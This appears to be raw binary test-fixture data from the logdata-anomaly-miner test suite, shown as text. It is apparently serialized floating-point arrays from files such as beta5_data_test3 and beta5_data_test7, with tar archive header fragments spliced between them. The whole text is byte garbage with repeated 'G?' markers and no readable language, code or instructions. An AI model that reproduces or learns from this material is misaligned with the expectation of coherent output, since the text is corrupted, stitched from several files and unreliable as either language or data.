'G?ٚ)"G?ŏHiG?C~ G?@FG?k}G?!ƅzG?!G?C>?LG?TG?K)#G?ЛG?U)G?ȼG?pJޣG?=`G?AuG?$hHiuG?b))vG?bQG?~= G?ɑZG?x .hG?rG?bhG?2G?ibG?,`h@G?@t oG?p}G?yQG?yG?3`G?l\jG?g e>G?_41kG?4ȴQG?A}G?τeGG? [G?VqG?aִG?ɞ-XG?+'G?RqP 8G?SI5G?q ІG?c0G?7G?lRG?dusG?҄spG?DҠG?V UG?MG?RJG?wSrG?}K%G??֚(G?tϽAG?¥7B'G?Ż*G?_n|i,G?ޓG?46G?yk*7G?5G?G9kG? G?:WHYG?򥭲iG?.G?h2UǞG?Ɵq5ԟG?qDG?B%G?dG?a4*G?XuDG?5G?慩G?6:G?\cUG?u8zG?VΣG?1G?ߨQ6G?$rrG?䄂~G?YcG?UutZG? 
G?aCG?1uG?2xG?e ]G?FmcG?{G?HbG?i,G?-G?2ZG?6 G?TG?p~AiG?KG?uqb6G?̊)G?}6G?{VD3G?QvG?[./gG?k MG?̜)ʱG?e_沨G?˄=qG?@C?G?XG?L'iG?s:]G?X !_G?NG?تOG?ɜ.G?k4G?v%JI/G?gOG?^݌G?.)G?hG?ٽ G?>G?/w+mG?S'sCG?,kG?G#CG?İ XG?vIZCG?¦9nG?;G?Ã4$ G?ApMG?;BG?m.b%G?KjUzNG? SG?!u\xG?s)d6G? %:)G?FAyG?ܜ? G?EQgG?9QIyG?y'1!G?NɎ%+G?{DAH$G?1MwG?:Aʻ.G?tсG?t!mG?xG?xz3jG?mtGG?M efG?i!FG?vipYHG?!G?3S&OG?m٫xG?}y#G?6ʚG? G?|wG?{Z:)G?GG?˱O#F3G?F?R G?n9G?lrG?kG?CHG?1 G?fnx3G?P+Q7G?AעG? 0)G?VG?=q(nG?_3G?HodmG?5h-GG?iUG?]G?EGjG?YkgG?G?YG?:G? q79G?*kLG?' G?7qtG?OO W͸G?{LG?^H oG?9 ~G?z#qlG?ÜKRG?{[lAG?"kG?kG?#9гG?\r0G?Hf]/G?+cuQG?ˬ1 GG?B+G?0*)G?a0`G?LG6G?pL-?G?MG?a aHG?hҕ}G?ӂP@G?4]3G?ÐGG?Ң)G?Ӷ&G?) ΰG?܄?ХgG?5⪌G?}G?ddEG?p˃G?r3G,G?zG?ׯ\AG?LF@G?mfBG?@BVG?ٯ*eG?SG?ijLG?}H6rG?4P@~G?nBfG?)$G?P`mG?\ҰG?:.^G?IP0YG?¢v4uG?SFىxG?侓P8G?!(G?TG?@oJG?8K\c G?G?RTG?WG?hTtI+G?-$G?,UGfG?ZǾG?g?TG?ԠG?րCxG?'ƛ 0G?_V.G?47G?IIcJG?G?$\G?SG?NeG?r%M{G?4G?sVG?}cyG? V`2G?nG?s FG?(G?3i_:G?HZG??ԦG?[P<G?\NG?xG?NWTG?{WQ/G?x,^{ G?cEG?^XBqG?r>ߘG?@UfG?V&G?r 8G?0_G?2#5G?D۳1G?g ja?G?qkG?)G?0G?^ᑔ)G?~\G? &;WG?6VR1G?<0LxG?x'(oG?ځGG?;U\G?(y/G?ZUG?OeiG?pG?qB̈G?RG?к;G?d|G?ɖkwISG?TG?ƍ+G?=~G?(+jhG?h aqޑG?8G?/.G?ǁ zG?4$SG?StgƃeG?tŒ-G?{G?qIwXG?/UD/G?Mӗ7V7G?\I3FG?2G?pV8G?qn{G?*Bì_G?`"G?mt"G?%d[PG?ѷ$G?ܛ^m3G?$ G?X`薕G?(|@G?B&G?ZG?uE0\G?}2G?G?FޗG?dG?yןG?Z?G?vPG?jq_G?kNxG?n\PG? ٻ G?SdG?߀Q 7BG?ľa]XG?SOG?`OG?'sIuG?erG?؃G?Y_G?٥G?t1G?%IG?E鹸0G?z!hG?ↀ3fG?qMG? T'ΚG?eޛ}G?z5SG?&I(YG?ɼBS2G?P=uzG?YXGDG?E&G?Ŝ*G?+XlG?|lώG?Ϝ9;WG?E8!VG?kG?DG?ZNG?)]7G?yh.XG?qԂG?i;$G?SGWe(G?!0DMfG?spG? JG? ivG?꠳:G?N G?8q\%G?/G?<\G? $OG?x42>hG?VgG?N#G?ƂtG?Vt?G?#僎G?RVG?n۠G?OG?'G?8?G?l}G?VPG? G?幅G?Ū*cM9G?.xnG? 6}@G?8h`ײG?G?@G?4WG?1cG? [(G?ԨXhkG?^cG?$G?k~G?ѷhPG?S ȺxG?FG?y:G?Λ: G?>G?uׇQJG?iiG?ŨľG?|p6G?%WG?S>#2G?AsG?e1G?$9G?wكG?`jiG?˻QVG? G?J藓G?NsG?CJWs,G?i e$gG?'qܭZG?G}oG?7^G?}HKQ G?l8G?G?ݞ}G?~#G?^6G?JPrKG?3.bG?øXG?ܣܶG?!G?."G?^?G?ُ)ċG?]&T G?А+DVG?ĺG?Y%`G?gHG? ~ 9G?l'kG?ӣ*G?r?3G?K&G?[G?E~(G?Q@G?H%G? wG?3ic'G?fCG?v$7%G?*(, G?BĸQ*G?*G?f'G?MN[G? [SG?! $RG? 
~iG?B${/G?(=fG?fWG?á|G?R\xG?i^bG?m.ۦG?ѕ83G?%#ȰG?Ւ{G?0\G?PPG?ܾG?VIZG?TPG?™(JG?'lܺG?vgeG?@6HG?Gr2 G?e#%EG?bZ!xG?qWoG?wMfG?'R޻gG?Rj(G?d;OG?ظȈrG?O G?[z~G?|KZG?D!-vnG?i{G??1cG?i*G?ԝ lG?{wG?~'ƼG?Ѿ (G?ʧzG?tnwG?I6G? G?ђg8G?ázL G?]y zG?)V;G?bS@~G?ͱ[G?fEG?x4cG?PŨKG?ځG?MQRG?d(G?ȶ2oG?cr/vG?X[?&G?E9G?:hIG?GG?`- ?G?swG?(R G?2tfMIG?,tG?X\G?0G?X`ҟ*G?Q0s_G?0䊖2G?HgeG?܅G?y})G?Úʎ >G?ժG?ҳ\dG? F#lG?˔G?8r3G?֖>QG?A(G?wHmG?G?0$ӥG?٣fG?3% @G?TwG?=WG?G?ںɪ,G?(܏G?CJ }G?`c;ʟG?UG?Ԧ,G?i&G? G?#v]xG?}&\G?i T3 G?y7G?ξimG?ŢhrgG?+psG?QxqyZG?p\G?1܋CG?'+r=G?G?a2(6G?#×G?˯ExG?>3fG?|lSG?`&ZXG?V0`[G?rNG?JP''G?DxUG?+e sG?CyKG?`ZdMG?r$G?淺(JG?vːG?,nMG?pTG?eja $G?ˋ]YG?>J9G?sG?lgG?VIG?hvG?ݗWiG?"1 G?ZXӌG? JG?܎juG?G|@G?ޭG?z%G? 0K!G?˛RG?~`}G?ӀEAG?M{l,G?NG?'!G?/TmIG?>BcdG?G?ɚH(H?G?qy#c-G?, G?{=G?")iG?PG?G?/ODG?y9LG?`!ޑG?iG?K7 G?ޝu|G?կ`XwG?;= G?G?E}QG?-ã?G?oGG?CIG?iiHG? 'G?wAj֩G?؎v[G?yv G?ʀG?G?єYG?%Ÿ\'G?j酺G?ݾoG?8#JG?G?c +;G?>czG?cu,G?nxkG?u]%G?3G?LG?ڲk9¢G? sMG?ILCVUG?G?cSK! iG?`k SG?G-G?_G?[?h= G?vBݴ%G?G?}n)G?[G?XgXG?!VX2G?Z, G?D<@G?9G?op?*G?I IG? .`G?/UG?X[G?0 G?WG?XJG?n?WG?۾bhWG?w G?9bn.G?EʧG?̿3G? {VG?ǎ;dG?ީ#DiG?uG?αI-G?ȟ=G?iMG?ȗ 쪽G?",G?Z>,G?T]r'G? $&(IG?'$NG? G?RFG?АG?uƚG?טTY\G?LG?fW LG?W}_G?ĥl"|G?]ONG?߁ 5G?,{$=G?^AG?V,G?۷G?=<,bG?uitG?RĊG?j!iG?#g(G?k2G?mP|]G?nϢG?p[&G?sɴ(G?ʏ3G?G?YtUF:G?aG?˚;Β~G?q[PG?۪"G?nUG?=srYG?y!.G?|TG?`̴MjG?ofG?)wJG?lG?:G?C56 G?~ƈG?$AG?6BG?RVJG?ݧB}G?{iG?tvG?uYJMG?։ƒ|G?_0bG?3_) G?lw2G?rdG?&DG?RZJ6G?v@oG?o|mG?OC`G?]-G?+G?"NsyG?ed,G?Z(+G?էKYG?¯6G?ZP˜G?0G?""0G?˱sFddG?NBDuG?eRq=NG?-&b?G?RMlG?4RG?증 G?=G?]MM?aG?G?"aG?c< ,G? Q%G?į5{nG?G?'K/OG?ruG?_G?ӐG?UZ6*G? 1G?! 6G?CVG?DG?'G?]q FwG?ͱpG? . G?ЙgvN~G?tFG?'>-G?UaG?LxG?;G?iyG?#3 G?#dG?sRAUG?̸ֳiG?D$qaG?>(G?r?GG?)`/G? 3G?Ưi]ԽG?ЂG?ȱG?w*G?ml8G?ا-ӰG?u"BG? rLG?9X>G?asG?&!G?g\ G? TG?ٳrG?cҊsG?ZP PG?r~zRG?UeG?ΪG?PJ6G?vG?G?p㛒G?h3SR}G?ϞvnoG?G?ye1}3G?^EG?c:a@G?'o|LG?F(,G?l+օG?؍G&G?K8G?W7<4G?u^m G?{[+@G?=$G? ZG?ΡעG?kH1G?oFCG?;T jG?wDeG?$mMG?Nf8BG?rG? 
!>G?R(aG?u}fG?fG?oQo +G?eG?εۻG?_tSG?9BqG?*m{G?5HG?,klG?χMfG?r,TIG?&w|G?t7?oG?o[G?GLUG?ҡ 6G?\`G?̜!]G?ط<G?+MG?fPG?eG?t_QG?N(rG?D.G?#[BG?pqG?glG?9uEG?qYyG?B0wG?2G?ЁZXOWG?hUPcG?qxZG?y-G?7^,G?ʵtG?ƌPBG?pG?ү\uG?IӯG?ˎpG?h`WG?q1G?R!qG?Ȓ}InG?K6 \G?%lFG?<ܿG?]jG?D*G?4G?]1iG?g`G?ƑelG?gf@zG?(XyG?dG?ŵי9G?tfG?ҁ܁G?۳E(G?K4G?ÈG? &+ѻG? ?8Q_G?vG?{ꂐ!G?W xG?b!KG?e{oG?*ڟmG?Iv_ G?qOHG?)Θ޴G?@G?mxG?Ԗ$U\G?5G?oI G?<G?DʽG?{ G?ʂy G?TTMG?UG?{[VݰBG?є2E^G?pa1G?BZ~IeG?5 G?h_ZG?ƷgG?>a_G?~LLcz9G?{G?epG? .GG?XlG?z-KG?hTG?h?G?aڅG?VyUG?Ys0G?v,G? &7G?ɃG?UmVyG?hB G?CMG?;rG?W"36SG?!]+,fG?e"MbG?3TaG?$e](G?Na#G?&G?y'l#G?#=xG?ǩ G?EG?+G?"}s~G? ScG?xG?͂FEG?O&G?lmc!G?HG?j̯G?=!N0G?L&cG?\ͧrG?ѶG?y$hG?Ș)G?P$G?,HB'G?7HG?ưj5G?hG?}cG?KcrG?ҖnG?G=G? 87bUG?&2.9G?yEG?cG?|G?+\T[ G?lG>TG?MG?۪\1G?i-G?G?恿<G?yG?0*G?ϊG?sG?h_HT,~G?gȯAHG?߰GG?s3G?G?!&G?Ƹ4G?7SG?`I7G? "LyG?~{fRG?àtEG?j_5G?i_gZG?I:ox/G?^G?|؆G? XG?ֺStqG?)Wt G?gp6MG?we#G?GtJG?[CSxG?yjG?=ַ}G?yO$G?tG?D0LG?М#G0G?C|G?ߛ-yG?߷kG?\*AG?$КG?gyeUG?G?k5G?KbG?ءKLG? 1G?[ZG?B$G?ؼ" G?ܣz]G?2 G?͊a1G?fgG?:^ĊG? NG?Ɏ静#G?$G?}TPG?E.G?pN#G?,JwG?SڕG?A&:?G?\bG?v@90G?ȗG?z/G?vGrG?:QG?AG?:U`G?Ǥ> *G?֘tp2G?G?ѮxJG?7a3 (G?uEG?A G?àG?V7G?x$.G?/7 G?*kRG?,SMG?"lG?l?FG?|Z%G?ԥ7G?ä)G?wjZG?,*G?/<+ G?t{hG?Y8~G?ưΪgPG?=|gٕG?cqG?Mt G?u"G?L$G?=g7G?&_ G?әy6=G?ƃ^ɨKG?ehrhG?FL5G?WG?DbyG?1=G?8P<3G?X;Q3G?p7G?:(G?؞^G?[qG?[ltG?"0sG?78G?RG?G?/G?(1G?.=aG?"'G?z}^G?WEG?lJOG?Ѷ+NG?K dG?wTNG?L$G?ItBG?]mB7]G? kG?pR]G?qkbG?q\G?bkG?lj#G?bŭjG?wG?G?Ѥ=.G?{[G?qG?J]nG?uS[G?{:G?*G?E4s5G?A 7G?D|G?Ȱ2L1G?WzFG?¡ G?wG?걕TG?ÔK+ZG?=|4G?ڢ:bpG?~(G?g}G?ӣG?|4G?ٗhG?;"G?ܭÍG?ʔV8 G?5I1G?&35G?)G?U*7G?SPG?E>G?ɸ)qG?rU{G?}'G?AwG?^`UAG?ꖈPG?%[G?ͬG?"G?ク0G?bEG?N9G?{ Ђ(G?#%aG?xF̮G?ܸYvT #G?l G?O#>{G?RFXG?ۻ.G?$MG?݃Y?!G?؟nƼG?LvG?v/eG?Hx\XG? [W]G?ؖ FG?ʌveG?Y+G?y:\3LG?+ʤ.G?G?.I׼"G?ظFG?T,/G?#;G?Y(G?ҖiC# G?e,DG?SG?ᬳuG?E<[G?>P G?ǿ !RG?v3G?}fG?NA?FG?4jG?AG?ܣ^67eGG?;IG?}y|G?iO&G?7PG?G?ņ$cRG?ՁpG?N1É4G?Ýٔ~G?oERG?vnG? NlJG?§GG?"I 0G?8G?B+G?Lʇ[G?@4G?JiG?iBG?@l-G?ZqG? 
/(G?pPjG?.*˽G?ȎKG?xb!8G?n+G?߻5G?Λ G?=}G?8_VG?5VhhG?ou G?,)G?r, )G?WUG?e1Q5G?ѴOoFPG?{jܪG?mH jG?ו5G?ҿHKcG?21aG?e@G?H*G?*G?LGG?Jq(0G?#ڹ G?ߗG?lj.G?6!G?ҘD2QG?`xG?QVVG?f9pG?v9l_FG?*G?M] YG?٭/ G?(:)G?ЭG?G9ǍG?Akm7G?i\ G?36@G?%wMG?DZG?ЛhG?QMv[9G?D1͖CG?R"G?^Wv!iG?効jG?sE(G?hFWG?"J)^G?d?G?)g)G?I-G?cYG?+WG?ș*HG?|G?-n4G?ODG?uw_G?y^pG?Ici&G?-ǔG? CSCG?n?i]G? BxG?;'7kUG?6QG?bG?YdiG?SJ;G?c7sG?>,,G?1Sй)G?v kRG?ϖ4>G?K[G?!`޲G?lG?0RG?qIG?6G?)9NG?1}4lG?!^IG?2އyG?)rG?G?/G?%ФG?y=VG?RvcG?!WVzG??G?ǜCG?N[`G?{G?G??ٸ|G?F)OG?Nk G?QG?LT.HG? j G?nT2G?,߽G?KCG?ѽ2{G?  G?L|pG?|կG?ȞfG?\2"G?G?~G?6JZ{G?$G?V8FG?$G?E@]G?G?kRi"G?Pc(G?kG?n%- G?El6-G?ٙ}4G?Ȳ7GoG?˄:|]G?n5SG?8.G?F`ӊ?FG?7G?}J2HaG?XIG?J QPG?xCG?V(‘G?I.G?ĵ1_[G?|G?Ĕ>G?*XJIG?G?,%]7G? ~KG?bYBYBG?,^DJG?rYG?'^EG? X+"G?# G?zusG?^nG?z /#G?ٔ3lJG?cQYTG?RW~AG?]GG?-G?c}G?1!$G? ( FG?G֣G?2VG?CW}G?CG?Y:,G?C,JG?RK G?1jG?8/=G?u\gG?hPXG?*naG?RG?o%s"G?"*G?WM[QG?\߬G?ߠ;G?̍PG? IG?w0G?,iI%G?lp FG?ЋG?Ǿ7G?kG?PG?""kG?ᆓ*&$G?Є;G?dA)G?' +?G?|G?[SҶG?]-pG?϶djG?riYG?^G?bO;O[G?m1@G?Z8ԯnrG?2}P.G?쓅G?+ G?7 FG?-!G?2[G?.a(G?ǖ8TmG?^JG?Mx'G?AȀG?%fG?Oc+G?ʊ|$G? 8?!G?ع}G?5o=G?npQG? m G?kSG?i4G?5@lG?į(G?6,~G?fSG?oyxG?}|]G?zdiG?X%cBG?R;G?8QG?^PG?yл G? U*G?}v&G?$G?CusG?X5G?I%8G?EYG?̳#6G?rG{IG? iG?kPN_:G?ҡ;e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta5_data_test3000066400000000000000000000432761500476301700275310ustar00rootroot00000000000000F](](G?mP6LTG?pG?)72M]G?@9G?똉|݂G?Y G?歾G? $e|G?\EjG?܌-G?,W@RG?yBAG?_( D8G?W/vG?>PG?($G? Ta_G?#F"G?1gG?D!G?a}-G?̤G?אgG?M\G?>G? :EG?G?HXMG?B(tG?\" G?M׏G?wG?4G?rJG?HlG?yٚG?癀}h G?/9tG?ZzG?郮9;G? 9G?Elj?G?T|B;G?) jG?4<ǠG?ba1G?̒G?\֋$kG?`7AG?#g݈G?̺O G? 2G?^moMG?زM/;G?FEvG?"E G?G^.G?AG?Ԛd9G?G?]ޑ\:G?+%53G? G?@x3G?߶G?쫢mG? G?pwlG?Y˕G?E&+G?-`2G?T:4/G?IXG?Q9>G?6G?¨̉G? 4wG?DqEG?_G?xLG?v0G?G? *XG?P7~G?*AG?&ϙbG?뺺&-s5G?~9G?iaG? G?pRG?OSa~G?2JG?:/-G?~[G?AfG?d#G?k'G?]ڄrG?曐G?_G?nL5 G?MW$G?A ܆,G?MDOG? mG?r} G?ao"G?#/G?݇[ӥ\G?G?񅯘G?4G?8G?#X}G?JTsG?CFJG8G?2 ,CG?jfȜG?NG?F hG?l.G? KrG?)$G?ΰh G?2W[YG? 
} }G?{라G?PqYG?BSG?@JWG?TTG?ۡ4vG?ؔLmG?吒WG?hRiMG?EVNG?j)EG?DVsjDG?[SdqG? G?[G?'G?9KG?ʲ]!G?4B)G?Qc +G?wq(G?멱wTG?AG7G?7eG?o sG?G?'G?-PAG?,}U3G?إm(aG?KG?B%(G?èDG?T:G?s1;G?\%-UG?#% G?`G?(aVwG?8Y?G?e.G?NG?, G?JkG?(cyG?n$G?$s]G?춉ķqG? OG?f+>,G?&AEG? Hj-G?>嗤UG?+,G?!KG?,cA"G?[PG?^2'G?*G?3WG?2 eG?%G?sTG?}GVTG?~EG?[q4G?/LG?ǩ@/G?pG?3G? =G?~@G?KG?HtG?W@-fG?lӿG?5YD+G?7G?+OG?jR'G?!>G?=qEG?盜 яG?xiG?|xtG?qdG?{ۙ3G?1quG?12`G?iG?+!"ߢG?|G?!1G?kG?˩G?BG?)UG?4WG??G?wn"G? AaqG??)G?YLnG?p?G?uSG?M'< G?צ$#G? NG?߇GG?G?~hsG?h;4JG?đ;hG? m>G?MgLG?3ӤG?CG?#TG? "]G?rMG?~U G?]G?۟=*G?JNJmG?\3G?(7FG?/do"G?thdG?+ {G?~G?e.sG?7C"%G?tG?u:;G?y͑BG?@;eG? D`G?}pG?/vG?䊾 G?ѥG?ՍiZ@G?AߤG?;3(MzG?%G?߈x {LG?v&^G?j G?]&G?й&0G?ֲyG?nvG? `G?iV}G?+Ѷ?G?V1G?2G?6첹O3G?aHSG?B%G?~tHBG?\QrG?vTG? 0G^G?久 -a%G?亖 ?G?͢; iG? Q?G?y(/vG?eIaG?0wG?0G?/4HG?^GG?I G? AˌG?tޮG?"OG?Z^G?넳kG?KwG?గb%G?%EMG?F_G?ed!rG? G?Z[G?.Y؍ G?XOG?写fp G?뒀@W/G?X1G?]~G?W]NKG? G?A.ݺl#G?G?G?$1n(/G?2G8UG?* 8G?by+G?8#R8G?{N^G?ѣ\̢:G?5B|~G?v[iG?ZUG?aRG?٤gG?#_G?ﰘدG? PҵG?u.3G?]# 6G?VRG?EiPG?E"G?OcM_G?ߑǢG?: ]G?hG?qq;;G?|ӚG? vG?n FG?{zG?\G?h{G?G?P\:G?>G?첻G?1G?)!:G?j,f_(G?pG?ѵG?~ŷG? G?WG?IG?! :G?#5G?+u8G?bG?Gi&G?~HHG?4ހG?冭'jG?:G?,r-ԀG?BFlpG?.̯?G?jG?챋4'G?ꄲQG? 1G?xƪ;G? w0NG? Bc~=G?rLG?*N%G? g|G?hLbG?&)G?vWݯG?_vQG?>̥G?P=G? *G?Jt34G?0qG?eyG?RVG?uhxG?oG?jV3G? ݊NlG?lG?Z.ZG?0ϥ'G?c=JG?+&G?jRG?侰Q_G?$bkG?.b}j%G?sQՖ/G? I@G?@G?ZWG?Px.qG?썿>ߡ5G?4Ne(G?8$G?uDF,G?mOM|G?L G?kFG?U3G?ndG?곓G?/'UWG?噴?aG?뒃ȫ]G?VG?%蜭G?zNf$G?Q#aG?*G?LžG?PG?БG?qtG?3"޸ G?ۈ]G?>V"mG?UG[G?=s-G?^^%G? ;&G?셿,G?)se8G?H_G? ,CG?.cG?)G?ٙ@G?ѣ^G?GjG?@$ЖG?PG?IG?HZ?G?4G?V3#G?]G?`VG?dB5G?˅ G?wټ[G?v$G?@9G?^\G?)S>G?y*G?X&G?7IG?T~ȄG?! /G?$G?SlG?,D7m兖G?YvG?4G?頇!APG?~G?/G?~ |}G?dzdsG?CG?M"גeG?G?ө ]!G?jIǦG?G?0uG?ml G?I)G?7n*G?pWmG?2IG?`HD-G?D7~G?YM+CG?|Й G?DRG?9 PG?\}$G?TG?"/'ύ`G?N攻G?Dw:2G?/iG?HWG?LC<+G?caG?J7$G?2dYG?!G?.R|աG?ň1LG? ba/G?:G?l"JPG?馱\G?g0ezG?qTG?'r1G?KűZyG?t|;G?:@G? 
%j2G?L$G?̠TG?K\P]G?\.tG?>ߨOG?G?^>XG?CuG?QS{~G?1%OiG?5G?g9G?_zzG?P_G?ɚG?tG?ac@G?|ꞙG?8mG?pLG?jG?na{MG?a@1G?EG?cAG?8!G?(G?xG??G?9TpG?UmiG?pSG?/;G?TrG?+hG?9BёG?a4G?eG?k嘖G?sG? x$iG?vG?$P8,G? CG?mG3G?}[G?s~G?6G?uyG?שSG?I iSG?A>$G?rMo3G?.G?; =zG?{!G?i15G?XI%G?J<$G?X1tdG?뾡IG?ycUG?tNG?LUG?~7SLG?JyqG?G?SG?~|G?A2b1G?)\ G?R5QG?3-"G?;Yގ,G?%OvuG?}vŧG?"OuG?]߁G?ҪG?{G?P_G?4nKG?< G?NdVG?xhe"G?0cG?布ŠMG?zVRG?biHG? F9LG?˶RG?aYG? \G?kG?^+*G?주ZtG?}zG?ܱG?<爉G?&G?0QLՖG?ïyG?[dG?s ZEG?G: G?n,gG? wKjG?%"G?:G?n:cG?[ G?BG?*GcRG?a +EG?R/TQG?;WG?UvMO#G?!: G?#fG?oG?!*G?yjG?BӫG?4ZG?nWLG?lR}uG?TnG?eKG?m3G?麶G?Nl3G?b4G?正h1G?BvDFG?ܫ SHG?h1,G?[@G?13G?VxA/G? 8G?įy6G?"곑uUG?G?.G?=qG?8G?T:G?̎(FG?}HG?n|pG?;lRxRG?|%G?Α@G?zwvG?EaG? IG?;`iG? Cg%G?JPG?$0O/G?r3jG?cgG?U|?G?ʒG?ōeG?/ȉsۊG?8CG?o3OvG?ʍ@ǛG?"5G?RD%G?}G?ûJr7/G?R{覗G?ﻄݧG?uXG?sg(G?g[\G?6G?iDG?aGpG?y%hG?F]G?i*G?~ѼDG?璒cG?몌 G?>$k-G?yHFG?~uG? G?޻6G?QNG?Tc{G?91G?1|MG?-gG?f/G?p F%G?@uG?EOVG?*o1G?碍B G?CG?G?큣G?*onG?%G?ȻdxGG?Pv-G?=G?gؓ0cG?fvgG?φG?fAPJG? G? z G?(jG?ieXG?rv-G?QKG? G?? G?Ư|LG?﴿G?@d1G?=^4zG?$a G?n`G?2J٠rG?ۏG?ѼeG?uG?-G?G?/#G?(żZG?+68G?ӥG?͞*G?^G? mGPbG?N3'G?y(\0G?<>cG?À@G?qkG?h]G?夂#,G?\]=yG?t/2G?EzG?.0FG?ȴG?3}2)G?X7) G?S)G?G?osiG?^G?K-͓G?W"G?嶭Q&G?=ԋG?D?7:G?)ݗG?s)&G?jyG?6NG?-cG?!Sg]0G?MXG?ztG?Y)G?}G?؃ G?g1b=;G?sZaG?"RG?٣1G?G?U(G?, IG?p%oG?DhP1G?쾱G?O1P*G?Nr>@CG?L[;{G?LG? SG?UXCG?r3G?xAG?Y[HG?#G?-jDžG?eA!G?kaG?oG?G?#G*G?p-G?FG?ϛvDG?G?jc.G?/zG?G?gh[G?`>{G?`{JG? .e#G?XrG?7G?}=iG?XAjG?JG?YG7*:G?٣G?鵗 G?UrJG?흸G?RYDG?[5Ґ`0G?(G?U֛rG?V=KG?^„"G? xG?퇓`[G?ǟJG?/4pG?J| G? G?L-G?뾄.JG?~^G?ǖ>G?K,-]G?꤀ɛ2G?xY.G?ƩG?tzG?fG?ԨG?G?GO<G? f>qG?tmZ `G?YyFEG?5%G? ϼG?VZ'" G?ﴦbG?KSh|G?0I3ҫG?CG?>~m:G?u-G?yVl9G?6xG?kG?P g-G?*G?}oG?Ȱ^G?r]"4G?ȦYG?ʣ2aG?zHG?pqG?/}G?t1OG?T/`G?;ئG?ֽW'YG?gEG?]e@2G?d}QG?:XG?G6<G?zз6G?'OtG?陽);G?݄ՔG?Q G(>G?; G?yG?zRG? J^G?竓MAG?ĕ G?2G?hG?}ޕxG?A-}G?p+PUG?37kG?Sc?G?^x_[G?3FG?dmG?CRG?ieIG?]DG?N}G?aӗ`G?w-G?d]G?EdvG?qyGG?e*bG?ʝdG?FG?t)bG?0>cG?!G?HqG?&O+׀G? G? 
4G?4r>G?Tg]WG?怪AG?gmSG?ʲ:G?qľG?‰ G?do G?F~G?@iG?>95G?E- G?)"G?m*G?eŜG?$uvHG?/jG?p$G?T OwoG?UٍG?u:G?|yD G?!>L G?9Z,G?0o G?=3 HG?.KG?m"G?G?WG?G`SRG?ȫG?,$XJG?1ꤻG?G?-eG?]G?:ռG?纕$(HG?)r G?ꈭXڍG?[{NΩlG?G?PZG? oo#G?IG?ˠHsXG?!,G?k skG?#;RG?뱅)3G?篋3G?إx G?@*G? -&G?KzZAG?.7P@G?556G?&(G?ۜ:G?:K3G?8opkG?CG?-ҼG?|YG?UۧuG?ӬiG? ݁9G?[PCG?g0+G?8QG?唘> G?^ڋG?ᯙG?0GMG?[*lG?aG?cG??G?o`G?χG?5!RG?B40G?L8[ߚG?YmG?=mG?Gm4sG?ݮQUG?ZG?Tm[ŜG?7|G?cO8lG?ZAG?MG?FG?6G?l0G?Om|G?gNG?pP}G?\ U G?eIuNKG?% G?럌B5;G?}G?DNL4G?縫ޓG?eEAG?҈J:G?X=G?egvCG?%*1G?-"HqG?IT]JG?^;G?A)pG?yaG?51G??"=G?ɫG?栨_C~G?3 G?)bG? D-G?Ꙍ?=G? }.G?At G?iV2jG?K&'G?R*UG?hʒG?^T=VG?渠1=vG?UOJ6G? BG?N+5G?e:^G?yG?G?yG?/dG?7NG?՚^G?'G6G?;=Q:G?o٥G?莖;DG?"b1G?1[G? {>G?XRG? FQWAG?ĹoLG?닪 G?,>G? @G?uðG?IaG?9nG?zӿiG?N2ڔG? b\G?ܩ G?[ T-G?W&̝KG?" G?we-bG?LϲG?xlG?JYFG?&&\G?qi/G?݉9F1K~G?F3ZGG?0,{9[G? '^\G?N&5N~$G?C5G?F\G?IG?B[`~G?~@G?^I-G? G?6!q@G?.TG?U]G?zG?$G?σG?1hG??!G?~G~wG?2zQG?!EG?gNG?GuƟG?崩;G?8*6OG?U DG?L~%tG?GP]G?/(cG?p*8G?aǗØG?yK_G?56cUeG?LG?7@ZG?LA$G?, G?عKuLG?8LKG?(ärG?IG?G?һ5G?gG?2>BG?鶨LG?{:2G?NB4e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta5_data_test7000066400000000000000000000647021500476301700275320ustar00rootroot00000000000000i](](G?-_G?GMsBG?Z} G?R1G?NG?uGDG?GϚG?G?H9G?g^(5kG?V;LG?ݣ%G?~zdG?$^LG?(G?z&1ӂG?YGG?MG?Ǩz)G?'uG?PpG?A)lG?JMɩfqG?pCG?锢@;G?C\G?(WNgMG?^K<9G?=G?@ G?FG?{G?BsG?W֢G?ާj4n^G?H)G?Ye=G?Si G?ò8ZG?ɧG?7E6G?)}G?Sx( G?, JfG?hAG? .l>G?MvG?뤅KG?좡G?Z-kG?=5G?DzlG?t^G?QƻG?NE*G?0'# "G?T2G?gZG?R_BG?hG?诲e6 G? G?:ZGG?\%cG?zǓ_G?,i{G?4\ZG?E "SeG?MZTG?jCG?2AQHG?툎YG?&kV1?G?WG?e}G?E0vG?O@"G?7wRIճG?Ct"G?E %]CG?eYx7G? b_~G?7 TG?bvX.G? V8+G?A G?eSG?N,G?d9;G?(G?Z7G?츰NG?8 LVG?[1NG? TG?HQ&G?nG? :4G?_VG?뺈AG?aXG?RBnG?* }&G?f TG?G?WgG?zG?Wr՞G?!G?OԣG?;G?pG?xx)G?`?ve,wG?࣐e:'G?êHkG?1IG? BVG?{[@G?73 G?h|MXG?_ G?݂-G?{Q*G?cv7G?4]uG?^?xpG?f_G?qG?̶hG?ȉ5vpG?ZG?FуVG?՟G?9lsKG?s`"@zG?dЇrG?ޒJX%G?[(3G?)i G?k\G? 
cG?P{nIG?OSG?t}LG?=GG?Hzv_G??>G?({G?٢fG?06l G?8U-G?G?L%G?hl&G?bHG?4`6G?뒆."G?̶uU{G?W^G?yN~G?FcG?G G?na;GG?:dG?G?G?dLs>G?ՒG?2MݲG?YB G?#ҨG?ǸqG?@G?G?Rg|fG?GG?RegG?t%G?]tG?*tG?wKG?(;G?O!G?KgG?h&uG?tG?]/G?'!aG?Pm`G?EfتzG? G?њSG?0hNoG?. 6G?KG?N3YG?VOG?F+G??(ʹ{G?C2+YG?L G?Q>SG? lQGG?J^ -G? CG?G?ꬬFG? G?(_]<.G?3m@G?dAG?ĶO.G?[!G?V_XxG?9(9G?ȬwG?61BvG?upeG?/8G?,BnWG?qG?ЗG?s,AG?_nu* G?daG?w?G? G?08:}2G?oG?ᾼAG?4KL+G?eꢭG?ݓwtrG? @G?p<G? =9MG?ϏW(G?tHuG?禆ZmG?O/G?sG?۾jG?')G?够@?G?x@seG? ZG?G?G?G?? G?7PlG?\DG?HOrG?3q">G?-\G? * G?CG?8lG?c$JG?7;'G?) 